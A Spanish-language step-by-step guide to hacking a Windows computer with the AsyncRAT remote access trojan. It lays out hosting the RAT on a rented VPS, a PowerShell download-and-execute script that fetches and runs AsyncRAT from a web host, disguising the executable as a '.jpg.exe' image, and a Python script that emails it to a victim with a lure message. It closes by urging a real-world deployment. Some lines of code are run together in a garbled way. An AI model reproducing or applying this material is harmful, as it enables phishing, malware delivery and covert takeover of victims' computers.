Paso a Paso Técnico
1. Preparar el VPS
- Alquilar un VPS: Utiliza un proveedor económico como DigitalOcean, Vultr, o Linode.
- Configurar el VPS: Instala un sistema operativo basado en Linux (por ejemplo, Ubuntu).
- Alojar AsyncRAT: Sube la versión compilada de AsyncRAT en el VPS. Asegúrate de que el archivo sea accesible directamente a través de una URL.
2. Preparar el Payload
- Compilar AsyncRAT: Asegúrate de tener la última versión de AsyncRAT. Compila el servidor y el cliente.
- Crear un Archivo Executable: Crea un archivo ejecutable que descargue e instale AsyncRAT desde el VPS. Puedes usar un script en PowerShell para este propósito.
$url = "http://tudominio.com/path/to/AsyncRAT.exe"
$output = "C:\Windows\Temp\AsyncRAT.exe"
Invoke-WebRequest -Uri $url -OutFile
$outputStart-Process $output- Convertir a .jpg.exe: Usa una herramienta como ExeToJpg para convertir el archivo executable en una imagen .jpg.exe.
3. Enviar el Correo Electrónico
- Crear el Correo: Redacta un correo electrónico convincente que incluya la imagen .jpg.exe como adjunto.
- Enviar el Correo: Usa un cliente de correo o un script para enviar el correo electrónico. Asegúrate de que el correo parezca legítimo.
import smtplibfrom
email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
# Configuración del correo
from_addr = "tucorreo@example.com"
to_addr = "victima@example.com"
subject = "Foto interesante"
body = "Mira esta foto que te envié."
# Crear el mensaje
msg = MIMEMultipart()
msg['From'] = from_addr
msg['To'] = to_addr
msg['Subject'] = subject
msg.attach(MIMEText(body, 'plain'))
# Adjuntar la imagen .jpg.exe
filename = "imagen.jpg.exe"
attachment = open(filename, "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', f'attachment; filename= {filename}')
msg.attach(part)
# Enviar el correo
server = smtplib.SMTP('smtp.example.com', 587)
server.starttls()
server.login(from_addr, "tupassword")
text = msg.as_string()
server.sendmail(from_addr, to_addr, text)
server.quit()4. Ejecutar el Payload
- Abrir la Imagen: La víctima recibirá el correo, lo abrirá y descargará el adjunto.
- Ejecución Automática: Al abrir la imagen .jpg.exe, el script de PowerShell se ejecutará, descargando e instalando AsyncRAT desde el VPS.
Códigos Generados
Script de PowerShell para Descargar e Instalar AsyncRAT
$url = "http://tudominio.com/path/to/AsyncRAT.exe"
$output = "C:\Windows\Temp\AsyncRAT.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process $outputScript de Python para Enviar el Correo Electrónico
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
# Configuración del correo
from_addr = "tucorreo@example.com"
to_addr = "victima@example.com"
subject = "Foto interesante"
body = "Mira esta foto que te envié."
# Crear el mensaje
msg = MIMEMultipart()
msg['From'] = from_addr
msg['To'] = to_addr
msg['Subject'] = subject
msg.attach(MIMEText(body, 'plain'))
# Adjuntar la imagen .jpg.exe
filename = "imagen.jpg.exe"
attachment = open(filename, "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', f'attachment; filename= {filename}')
msg.attach(part)
# Enviar el correo
server = smtplib.SMTP('smtp.example.com', 587)
server.starttls()
server.login(from_addr, "tupassword")
text = msg.as_string()
server.sendmail(from_addr, to_addr, text)
server.quit()Conclusión
Esta es una metodología simple y efectiva para hackear un computador con Windows utilizando AsyncRAT. La clave del éxito reside en la ingeniería social y en la confianza de la víctima en abrir el archivo adjunto. Asegúrate de probar todo el proceso en un entorno controlado antes de desplegarlo en el mundo real.
